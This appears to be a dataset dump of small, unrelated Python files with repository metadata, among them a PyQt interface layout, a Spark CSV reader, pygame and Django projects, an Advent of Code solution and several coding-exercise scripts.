self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.label_head = QtGui.QLabel(self.centralwidget)
self.label_head.setGeometry(QtCore.QRect(10, 10, 1091, 32))
font = QtGui.QFont()
font.setFamily("DejaVu Sans Mono")
font.setPointSize(20)
self.label_head.setFont(font)
self.label_head.setAlignment(QtCore.Qt.AlignCenter)
self.label_head.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.label_head.setObjectName("label_head")
self.pushButton_lancControl = QtGui.QPushButton(self.centralwidget)
self.pushButton_lancControl.setGeometry(QtCore.QRect(10, 460, 160, 41))
self.pushButton_lancControl.setObjectName("pushButton_lancControl")
self.label_ip_port = QtGui.QLabel(self.centralwidget)
self.label_ip_port.setGeometry(QtCore.QRect(10, 420, 151, 34))
font = QtGui.QFont()
font.setFamily("DejaVu Sans Mono")
font.setPointSize(8)
self.label_ip_port.setFont(font)
self.label_ip_port.setAlignment(QtCore.Qt.AlignCenter)
self.label_ip_port.setObjectName("label_ip_port")
self.frame_com_placeholder = QtGui.QFrame(self.centralwidget)
self.frame_com_placeholder.setGeometry(QtCore.QRect(10, 270, 160, 150))
self.frame_com_placeholder.setMinimumSize(QtCore.QSize(160, 150))
self.frame_com_placeholder.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_com_placeholder.setFrameShadow(QtGui.QFrame.Raised)
self.frame_com_placeholder.setObjectName("frame_com_placeholder")
self.frame_control_placeholder = QtGui.QFrame(self.centralwidget)
self.frame_control_placeholder.setGeometry(QtCore.QRect(10, 50, 500, 215))
self.frame_control_placeholder.setMinimumSize(QtCore.QSize(500, 215))
self.frame_control_placeholder.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_control_placeholder.setFrameShadow(QtGui.QFrame.Raised)
self.frame_control_placeholder.setObjectName("frame_control_placeholder")
self.frame_drives_placeholder = QtGui.QFrame(self.centralwidget)
self.frame_drives_placeholder.setGeometry(QtCore.QRect(170, 270, 160, 230))
self.frame_drives_placeholder.setMinimumSize(QtCore.QSize(160, 230))
self.frame_drives_placeholder.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_drives_placeholder.setFrameShadow(QtGui.QFrame.Raised)
self.frame_drives_placeholder.setObjectName("frame_drives_placeholder")
self.frame_points_placeholder = QtGui.QFrame(self.centralwidget)
self.frame_points_placeholder.setGeometry(QtCore.QRect(520, 50, 580, 460))
self.frame_points_placeholder.setMinimumSize(QtCore.QSize(500, 215))
self.frame_points_placeholder.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_points_placeholder.setFrameShadow(QtGui.QFrame.Raised)
self.frame_points_placeholder.setObjectName("frame_points_placeholder")
self.frame_sequencer_placeholder = QtGui.QFrame(self.centralwidget)
self.frame_sequencer_placeholder.setGeometry(QtCore.QRect(520, 510, 580, 180))
self.frame_sequencer_placeholder.setMinimumSize(QtCore.QSize(570, 180))
font = QtGui.QFont()
font.setFamily("DejaVu Sans Mono")
self.frame_sequencer_placeholder.setFont(font)
self.frame_sequencer_placeholder.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_sequencer_placeholder.setFrameShadow(QtGui.QFrame.Raised)
self.frame_sequencer_placeholder.setObjectName("frame_sequencer_placeholder")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1114, 21))
self.menubar.setNativeMenuBar(False)
self.menubar.setObjectName("menubar")
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
MainWindow.setMenuBar(self.menubar)
self.action_Load = QtGui.QAction(MainWindow)
self.action_Load.setObjectName("action_Load")
self.action_Save = QtGui.QAction(MainWindow)
self.action_Save.setObjectName("action_Save")
self.actionSetup = QtGui.QAction(MainWindow)
self.actionSetup.setObjectName("actionSetup")
self.action_Drive_Parameter = QtGui.QAction(MainWindow)
self.action_Drive_Parameter.setObjectName("action_Drive_Parameter")
self.menuFile.addAction(self.action_Load)
self.menuFile.addAction(self.action_Save)
self.menuFile.addAction(self.action_Drive_Parameter)
self.menubar.addAction(self.menuFile.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "StepperSuite V0.1 Alpha", None, QtGui.QApplication.UnicodeUTF8))
self.label_head.setText(QtGui.QApplication.translate("MainWindow", "StepperSuite V0.1 Alpha", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_lancControl.setText(QtGui.QApplication.translate("MainWindow", "lanc Control", None, QtGui.QApplication.UnicodeUTF8))
self.label_ip_port.setText(QtGui.QApplication.translate("MainWindow", "111.222.333.444:4567", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("MainWindow", "&File", None, QtGui.QApplication.UnicodeUTF8))
self.action_Load.setText(QtGui.QApplication.translate("MainWindow", "&Load", None, QtGui.QApplication.UnicodeUTF8))
self.action_Save.setText(QtGui.QApplication.translate("MainWindow", "&Save", None, QtGui.QApplication.UnicodeUTF8))
self.actionSetup.setText(QtGui.QApplication.translate("MainWindow", "Drive Parameter", None, QtGui.QApplication.UnicodeUTF8))
self.action_Drive_Parameter.setText(QtGui.QApplication.translate("MainWindow", "&Drive Parameter", None, QtGui.QApplication.UnicodeUTF8))
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
MainWindow = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"hpl@hpl.hpl"
] | hpl@hpl.hpl |
82c91f388c411504015973bf1a1a0877af34f0b5 | 66d54cc8a91f1faf24f1435a67610e6a17450483 | /Reader.py | 1babc787a7152fee4e9994491192745c6e7a2154 | [] | no_license | vickyasokan26/NikeAssignment | d88a4db6c9ffb3365df5e53bddd851e7e25d39d3 | 747e49c1e11760a4f9e966169c650a512063c9f8 | refs/heads/main | 2023-01-25T04:26:33.695109 | 2020-11-23T08:46:05 | 2020-11-23T08:46:05 | 315,249,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | '''
Created on Nov 17, 2020
@author: Vignesh.Asokan
'''
from pyspark.sql.types import *
from pyspark import HiveContext,SparkContext
from pyspark.sql.functions import *
from pyspark.sql.types import *
from pyspark.sql.window import *
class Reader(object):
def __init__(self, filePath,sparkSession):
'''
Constructor
'''
self.filePath=filePath
self.sparkSession=sparkSession
def read_csv(self,fileName):
print (self.filePath)
wandRawDf=self.sparkSession.read.csv(self.filePath+"/"+fileName,, header='true')
return wandRawDf
def read_df_data(self,sql):
df = self.sparkSession.sql(sql)
df.show()
return df
def prep_data(self, sqltext, tablename):
df = self.sparkSession.sql(sqltext)
df.registerTempTable(tablename)
print("Temporary spark table registered as %s" % tablename)
return df
| [
"noreply@github.com"
] | vickyasokan26.noreply@github.com |
14459048d6ce2c35a80f1df6dbb6c17aa6130118 | a07dd9194143bf7bcb3a2479d4b9306df96237f3 | /lab3/homework/back-color-problem/back_color.py | 3d7cb608ccb58e5c92d39a81b8c67d222036ff6b | [] | no_license | hanguyen31099/NguyenHA-lab-c4e25 | 8b97e1a7ccb37b5ad6809064f591500d99337f27 | bb77fd00b8db696dba3aee328cf2fd6e31448a2c | refs/heads/master | 2020-04-15T10:06:23.336077 | 2019-01-18T19:54:45 | 2019-01-18T19:54:45 | 164,580,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | from random import choice,randint
shapes = [
{
'text': 'blue',
'color': '#3F51B5',
'rect': [20, 60, 100, 100]
},
{
'text': 'red',
'color': '#C62828',
'rect': [140, 60, 100, 100]
},
{
'text': 'yellow',
'color': '#FFD600',
'rect': [20, 180, 100, 100]
},
{
'text': 'green',
'color': '#4CAF50',
'rect': [140, 180, 100, 100]
}
]
def is_inside(x,y):
if(y[0]+y[2])>=x[0]>=y[0] and (y[1]+y[3])>=x[1]>=y[1]:
return True
else:
return False
def get_shapes():
return shapes
def generate_quiz():
color =choice(shapes)
list_color=[]
for j in color:
list_color.append(color[j])
result=[]
result.append(list_color[0].upper())
result.append(list_color[1])
result.append(randint(0,1))
return result
def mouse_press(x, y, text, color, quiz_type):
for check in shapes:
if quiz_type == 1:
if check['text'].upper() == text:
user_click = is_inside([x, y], check['rect'])
else:
if check['color'] == color:
user_click = is_inside([x, y], check['rect'])
return user_click | [
"ducha31099@gmail.com"
] | ducha31099@gmail.com |
4d5c0786be25e6910e4ce018e76c712744d39dae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/74/usersdata/197/40006/submittedfiles/lecker.py | 2e27da6fdd494d21fc5e283193a357ccb803379a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
import math
a=int(input('Digite o valor do número a:'))
b=int(input('Digite o valor do número b:'))
c=int(input('Digite o valor do número c:'))
d=int(input('Digite o valor do número d:'))
if a>b and b<c and c>d:
print('N')
elif a==b==c==d:
print('N')
elif a<b and b>c and c<d:
print('N')
elif a>b and b<c and c<d:
print('N')
elif a==b==c>=d and a<b==c==d and a==b<c==d:
print('N')
else:
print('S') | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
407e0b18a27b4d34d828fa381f05a13aba1a286e | 12f2f98d8c9055d721afa065b49014c550bae999 | /alien_invasion/bullet.py | 3122099de4a668be5295666cb9b969324d425e91 | [] | no_license | zhangletian/LearnPython | 9568b79d23135f919fccbcf7e775d1fe6f6bcaf2 | 32b05e18a3d2f1da2fa3c82268abf384ab83fa73 | refs/heads/master | 2021-01-22T08:39:42.000182 | 2017-12-18T14:46:52 | 2017-12-18T14:46:52 | 92,629,716 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 940 | py | #coding=gbk
import pygame
from pygame.sprite import Sprite
class Bullet(Sprite):
"""一个对飞船发射的子弹进行管理的类"""
def __init__(self,ai_settings,screen,ship):
"""在飞船所处的位置创建一个子弹对象"""
super(Bullet,self).__init__() #这是继承了父类?
self.screen = screen
#在(0,0)处创建一个表示子弹的矩形,再设置正确的位置
self.rect = pygame.Rect(0,0,ai_settings.bullet_width,
ai_settings.bullet_height)
self.rect.centerx = ship.rect.centerx
self.rect.top = ship.rect.top
#存储用小数表示的子弹位置
self.y = float(self.rect.y)
self.color = ai_settings.bullet_color
self.speed_factor = ai_settings.bullet_speed_factor
def update(self):
"""向上移动子弹"""
self.y -= self.speed_factor
self.rect.y = self.y
def draw_bullet(self):
"""在屏幕上绘制子弹"""
pygame.draw.rect(self.screen,self.color,self.rect)
| [
"1007174589@qq.com"
] | 1007174589@qq.com |
f7234016547b643a8a80255493b8b3d0f411f538 | 5a9cad0e55708a25aa77296fba867cd06bf80a20 | /day8/handheld_halting_part2.py | acec6610074f0a157e553430d3641a7f6da6ef15 | [] | no_license | PlaybackSwede/advent-of-code-2020 | d10420eff54fe390e88fdaa72764b555c36d7d4b | 3c805715e0f3677ca55424ef709d82f8139a6f09 | refs/heads/master | 2023-02-13T17:06:50.951304 | 2020-12-19T22:51:39 | 2020-12-19T22:51:39 | 320,923,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,578 | py |
instructions_map = {}
map_copy = {}
def save_map():
global map_copy
map_copy = instructions_map.copy()
def reset_map():
global instructions_map
instructions_map = map_copy.copy()
def filter_jmp_nop(item):
[key, p] = item
if p[0] == 'jmp' or p[0] == 'nop':
return True
else:
return False
def run_program():
accumulator = 0
i = 0
while True:
(cmd, cmd_nbr, execs) = instructions_map[i]
if execs > 0:
#Program failed
break
else:
#Update instr as executed
instructions_map[i] = (cmd, cmd_nbr, execs + 1)
if cmd == 'acc':
accumulator += cmd_nbr
i += 1
elif cmd == 'jmp':
i += cmd_nbr
elif cmd == 'nop':
i += 1
if i == len(instructions_map):
#Program finished correctly
return accumulator
return -1
file = open('input.txt', 'r')
lines = file.readlines()
for ins_nbr, line in enumerate(lines):
[ins, val] = line.strip().strip('\n').split(' ')
instructions_map[ins_nbr] = (ins, int(val[1:]) if val[1:] == '+' else int(val), 0)
save_map()
nop_jmp_indexes = filter(filter_jmp_nop, instructions_map.items())
for idx, p in nop_jmp_indexes:
reset_map()
if p[0] == 'jmp':
instructions_map[idx] = ('nop', p[1], 0)
elif p[0] == 'nop':
instructions_map[idx] = ('jmp', p[1], 0)
accumulator = run_program()
if accumulator > 0:
print(accumulator)
break
| [
"pontus.ovhagen@tidal.com"
] | pontus.ovhagen@tidal.com |
61729e5a03e1c4aa8b0f6c6462fefde695f3b276 | 8300b53991e4bb2b7544e21240273d194dbe567b | /comp/migrations/0004_auto_20210104_1347.py | 286095e718fb96d2b2646852cc357a3385a98fc0 | [] | no_license | chaps78/CV_project_V2 | a60426de4f8af61ec4ad7f28278b7dc0ee114fef | cc77e864698f005ed0989b3b363ef789eb73c6c6 | refs/heads/main | 2023-04-22T13:11:48.496979 | 2021-05-08T15:17:15 | 2021-05-08T15:17:15 | 361,686,287 | 0 | 0 | null | 2021-05-01T15:01:32 | 2021-04-26T09:09:13 | JavaScript | UTF-8 | Python | false | false | 394 | py | # Generated by Django 3.1.4 on 2021-01-04 13:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('comp', '0003_auto_20210103_2026'),
]
operations = [
migrations.AlterField(
model_name='experiences',
name='logo_client',
field=models.CharField(max_length=200),
),
]
| [
"cyrille.chapuis@gmail.com"
] | cyrille.chapuis@gmail.com |
a914dad700cb4f51f4f78b503850c3b539eb8bac | 9b0b1902c4ae528b9ecf2d4a3c11d6e59a964d6e | /django-auth-tutorial-master/accounts/migrations/0001_initial.py | 78f5e3ce0d70ebe2eccab02659b76ade4cec2d61 | [] | no_license | radhac88/SMNS | d4330a4bba750a00c25f023562959ee8cd1529e7 | ec27e206cf7ebb84d7691c20c88e91ce2067a002 | refs/heads/master | 2020-03-21T12:56:38.310033 | 2018-11-30T06:04:06 | 2018-11-30T06:04:06 | 138,579,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | # Generated by Django 2.1.2 on 2018-10-25 09:23
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.CharField(max_length=160)),
('created_at', models.DateTimeField(auto_now_add=True)),
('profile_image', models.ImageField(blank=True, null=True, upload_to='post_image')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, unique=True)),
],
),
]
| [
"surya.kala@etggs.net"
] | surya.kala@etggs.net |
a85eca58f0c19dea7674254798bcf77bb60ed9b8 | a882ccf759025735f926695d6a5a39937854646a | /e_step4/pygame00.py | a91f3f96979ff338f83cd1d55dc042ebde65d456 | [] | no_license | muzudho/practice-open-cv2 | 5c1534564bcf43c2d8f7a6fb4ee1583bd77337f9 | 55af5cfb37587b08123b404cf8768d83148cb046 | refs/heads/main | 2023-07-08T02:23:22.984816 | 2021-08-10T10:45:01 | 2021-08-10T10:45:01 | 349,864,518 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,820 | py | """coding: utf -8
"""
# モジュールの読み込み
import sys
import time
import pygame
from pygame.locals import QUIT
# pygame の初期化
pygame.init()
# 画像の読み込み
# FRAME_COUNT = 380
FRAME_COUNT = 528
#FRAME_COUNT = 960
# FRAME_COUNT = 4560
#FRAME_COUNT = 1520
FPS = 8 # 例えば 15 フレームで撮影するなら、ゲーム画面はその半分の FPS ならコマ飛びを感じないぐらい
IMAGE1 = pygame.image.load('./@share/out-cstep4-0.png')
IMAGE1_W = IMAGE1.get_width() # 画像の横幅の取得
IMAGE1_H = IMAGE1.get_height() # 画像の高さの取得
DISPLAY_SIZE = (IMAGE1_W, IMAGE1_H) # width, height
SURFACE = pygame.display.set_mode(DISPLAY_SIZE) # アプリケーションウィンドウ
pygame.display.set_caption('Application: pygame00.py')
CLOCK = pygame.time.Clock() # フレームレート制御のための Clock オブジェクト
# 画像の先読み
FRAMES = []
for i in range(0, FRAME_COUNT):
IMAGE1 = pygame.image.load(f'./@share/out-cstep4-{i}.png')
FRAMES.append(IMAGE1)
# メインループ
WHITE = (255, 255, 255)
TOP_LEFT_P = (0, 0) # x, y
for j in range(0, 1): # 1ループ # 2ループ
for i in range(0, FRAME_COUNT):
# SURFACE.fill(WHITE) # 背景の色
SURFACE.blit(FRAMES[i], TOP_LEFT_P) # ボールの描画
# イベントキューを処理するループ
for ev in pygame.event.get():
if ev.type == QUIT: # 「終了」イベント
pygame.quit()
print('quitting...')
sys.exit()
# ディスプレイの更新
pygame.display.update()
if j == 0 and i == 0:
time.sleep(3) # Seconds
# フレームレートの設定
CLOCK.tick(FPS) # fps を指定
time.sleep(3) # Seconds
| [
"muzudho1@gmail.com"
] | muzudho1@gmail.com |
b85a75aeafda4547a9db1b598e1d8f93af10c136 | 3b628230666e2324b325d29ed8997a905dcba291 | /web/views/report.py | 17aff5f6356ae5632f81eedc4114595ae36f8fbe | [] | no_license | emohamed/obshtestvo.bg | 9f67734776ecdef5dfc5238a9caabd97c5e80cbd | b90c547a880294cc84956eb926413fb7118be133 | refs/heads/master | 2020-12-25T20:30:38.667603 | 2016-01-06T16:44:33 | 2016-01-06T16:46:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from django.views.generic.base import View
from restful.decorators import restful_view_templates
@restful_view_templates
class ReportView(View):
def get(self, request):
return {
"page": "inner report",
}
| [
"antitoxic@gmail.com"
] | antitoxic@gmail.com |
5cff3b1bc33ede63cb9e3659512f0fba13214867 | c112ad9cd1f60a4f301a2c5d8bf589a53caffffa | /poll/poll/urls.py | dd2f3c0d6a16565db30bd0890ce49dfda24ac3a5 | [] | no_license | HaliullinAnton/Poll | 95256760263fc7fd50d2b5776b6bc3732993d9ae | bfb71f21d4f74458f5e54c9ce34cac744b5ff881 | refs/heads/master | 2023-07-12T12:27:28.992957 | 2021-08-11T14:03:55 | 2021-08-11T14:03:55 | 395,005,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | """poll URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('polls/', include('polls.urls')),
]
| [
"[haliullinanton@gmail.com]"
] | [haliullinanton@gmail.com] |
77bf3568089d84dca57ebccf21f5df9caf089b6b | c1a9436f38714277b063d76af47e8b9448d5cc73 | /CRO/Molecule.py | 25eaa41d932d1644507e279a2297edc8bc7924ea | [] | no_license | rakib06/LearnPythonBasic | 83f5bf5c63a40e8d5f93ac3ffa0d0443fdc0519a | fc0b81850e76d38c6816bd9fe81b442b68d6bd75 | refs/heads/master | 2020-09-01T01:03:49.087763 | 2019-12-25T23:11:09 | 2019-12-25T23:11:09 | 218,835,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | def spin_words(sentence):
my_list = sentence.split()
result = ''
for i in range(len(my_list)):
x = my_list[i]
if len(x) >= 5:
x = x[::-1]
if i != 0:
result = result + ' ' + x
else:
result += x
return result
s = 'rettel rettel Kata than in etirW than desrever the in gnirts gnirts'
def spin_word_kata(sentence):
return " ".join([x[::-1] if len(x)>=5 else x for x in sentence.split()])
print(spin_word_kata(s))
my_list = ['hello', 'how', 'are', 'you']
print(' '.join(my_list), end='\n')
print(' '.join([x[::-1] if x != 'you' else x for x in my_list])) | [
"six.rakib@gmail.com"
] | six.rakib@gmail.com |
b99a928c8fc0e398ba790ae56619558cdf251bf0 | a9bffb96e00908f1f2134217685f46adcccd8bc6 | /random-collection/hats-see-front/xortest.py | b3918de3421dc58514284c9ef3e10be919955e3b | [] | no_license | frumpel/coding-questions | 0f498679d23127c269f452f1c3f1f46c69c4e320 | d5fd82cc6edd0299e9e02d73e639f40880bb13cd | refs/heads/master | 2021-01-22T05:38:48.066401 | 2019-03-24T21:29:00 | 2019-03-24T21:29:00 | 81,686,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,465 | py | """
Problem statement:
* death row prisoners are given a chance to go free if they guess their hat
* they can talk to each other
* they can only see the hats in front of them, not behind them
* they can say a color but nobody knows if it was right or not
* expected: save all but one and the last has a 50%% chance
Approach:
* blue - 0
* red - 1
* everyone counts the number of transitions flipping the bit starting with blue == no transitions
* last person gives the number of transitions = 50%
* everyone else counts transtions
"""
import random
num_prisoners = 10
def calc_xor(src):
# We are counting right to left. Init with last prisoner
xor = src[len(src)-1]
# XOR all remaining values
for ii in range(len(src)-2,-1,-1):
xor=xor^src[ii]
return xor
# Create a random list of hat assignments
src = [random.randrange(2) for x in range(num_prisoners)]
# Initialize temporary data arrays
crc = [False for x in range(num_prisoners)]
ans = [-1 for x in range(num_prisoners)]
# First prisoner answers with the XOR checksum
ans[0] = calc_xor(src[1:])
# All other prisoners answer with xor(hats they see)^xor(what prisoners have said)
for ii in range(1,num_prisoners):
# Calculate the XOR checksum - note that the checksum is already in ans[0]
ans[ii] = calc_xor(ans[:ii] + src[ii+1:])
# Output
print "Hats (looking right):",src
print "Prisoner says: ",ans
print "Is it true? ",[ans[ii]==src[ii] for ii in range(len(src))]
| [
"potucek@rppower3.local"
] | potucek@rppower3.local |
02c2c129135e6b8b655b6a7764566dd3e703f0b2 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_13280.py | 2846b517a21df83a34ad11137da1ded0a3e9d792 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 89 | py | # Django: Formset for adding captions to uploaded images
{{ form.instance.resized_img }}
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
0c3be3e50dc17d814ee948f1c54eb591fd5feb1f | 1337df464d8b4b41bd46c5d045a3a3192f09750b | /OS模块/os01.py | f54d14bb8b8bf6c6ed55d73352ba5d033fc3f7ed | [] | no_license | Maroonlk/untitled2 | 8ffad3252aea3780af29ff5acecc1085c3cf0471 | 8b0d36df6e814e1e2c72d9242b4134acf3a90270 | refs/heads/master | 2020-03-18T16:03:49.957280 | 2018-07-09T09:59:05 | 2018-07-09T09:59:05 | 134,944,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | # getcwd() 获取当前的工作目录
# 格式: os.getcwd()
# 返回值: 当前工作目录的字符串
import os
print(help(os.makedirs))
print(os.name)
print(os.sep) | [
"821365628@qq.com"
] | 821365628@qq.com |
a25ba26330eaf450d7af6eb13d30bf97f488af8f | 74e9116965365053f9deed1b2761a5d4cb77969b | /setup.py | 390a65932db9248d946ae400b70331edc15c1f6e | [] | no_license | ManivannanPeriathambi/PythonPackage | dfe107c50f3d682f263f374661b5bf3360fb56b4 | b3f473d4fe64cf37f2e0bc9923a95063ac2a324e | refs/heads/master | 2016-09-14T04:23:41.479440 | 2016-04-18T15:09:01 | 2016-04-18T15:09:01 | 56,467,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | import sys
from setuptools import setup, find_packages
setup(name='Sample',
version='1.0.0', # @UndefinedVariable
description='Sample python module for package demo',
url='https://github.com/ManivannanPeriathambi/PythonPackage.git',
author='Manivannan Periathambi',
author_email='manivannan.periathambi@gmail.com',
license='MIT',
packages=find_packages(exclude=['docs','tests*']),
zip_safe=True,
datafile=None) | [
"manivannan.periathambi@gmail.com"
] | manivannan.periathambi@gmail.com |
fc6599f1facb962365ee1e1292ec29b2f9baacb8 | 281c7a748aee9b5de82d3ad6d0b9caf5f5ebe862 | /produto/models.py | 1c0a81ee4132f863194bf8d5d70fb91c9009bab2 | [] | no_license | robertocorreajr/ecommerce | 2a0f1b8ce6154e7fbc71fdf205e04952aaabc669 | e808696629d315acff1a1e9f5a6ee25d265d069c | refs/heads/master | 2023-07-21T15:32:53.092149 | 2021-08-13T21:21:06 | 2021-08-13T21:21:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | from django.db import models
# Create your models here.
class Produto(models.Model):
nome = models.CharField(max_length=255)
descricao_curta = models.TextField(max_length=255)
descricao_longa = models.TextField()
imagem = models.ImageField(
upload_to='produto_imagem/%y/%m', blank=True, null=True)
slug = models.SlugField(unique=True)
preco_marketing = models.FloatField()
preco_marketing_promocional = models.FloatField(default=0)
tipo = models.CharField(
default='V',
max_length=1,
choices=(
('V', 'Variação'),
('S', 'Simples'),
)
)
def __str__(self):
return self.nome
| [
"rc.lima.jr@gmail.com"
] | rc.lima.jr@gmail.com |
1a539493e0d2462c4b574a303523a1e5caf19b45 | 23b053acbf74e57e897672cc7875377d7b6141c9 | /djangoproject/brew/migrations/0013_auto__del_field_mashlog_mashingschemeitem_started__add_field_mashlog_a.py | 272cbe8b4fd57a268ae73bde6e09c0fd54c33723 | [
"ISC"
] | permissive | StryKaizer/Brew | a485a900b8072677efce704d3e773b6eefb57e6e | 09780bc8b9fd6e6e5f952f2219d0c4dd25a6e526 | refs/heads/master | 2021-01-22T13:37:49.077968 | 2013-03-18T22:33:54 | 2013-03-18T22:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,708 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'MashLog.mashingschemeitem_started'
db.delete_column('brew_mashlog', 'mashingschemeitem_started_id')
# Adding field 'MashLog.active_mashing_scheme_item'
db.add_column('brew_mashlog', 'active_mashing_scheme_item',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['brew.MashingSchemeItem']),
keep_default=False)
# Adding field 'MashLog.status'
db.add_column('brew_mashlog', 'status',
self.gf('django.db.models.fields.CharField')(default=None, max_length=1),
keep_default=False)
def backwards(self, orm):
# Adding field 'MashLog.mashingschemeitem_started'
db.add_column('brew_mashlog', 'mashingschemeitem_started',
self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['brew.MashingSchemeItem'], null=True, blank=True),
keep_default=False)
# Deleting field 'MashLog.active_mashing_scheme_item'
db.delete_column('brew_mashlog', 'active_mashing_scheme_item_id')
# Deleting field 'MashLog.status'
db.delete_column('brew_mashlog', 'status')
models = {
'brew.batch': {
'Meta': {'object_name': 'Batch'},
'brewing_date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mashing_scheme': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingScheme']"}),
'number': ('django.db.models.fields.IntegerField', [], {'max_length': '3'})
},
'brew.mashingscheme': {
'Meta': {'object_name': 'MashingScheme'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'brew.mashingschemeitem': {
'Meta': {'object_name': 'MashingSchemeItem'},
'degrees': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mashing_scheme': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingScheme']"}),
'minutes': ('django.db.models.fields.CharField', [], {'max_length': '3'})
},
'brew.mashlog': {
'Meta': {'object_name': 'MashLog'},
'active_mashing_scheme_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.MashingSchemeItem']"}),
'batch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['brew.Batch']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'degrees': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'brew.variable': {
'Meta': {'object_name': 'Variable'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '127'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '255'})
}
}
complete_apps = ['brew'] | [
"jimmyhdx@gmail.com"
] | jimmyhdx@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.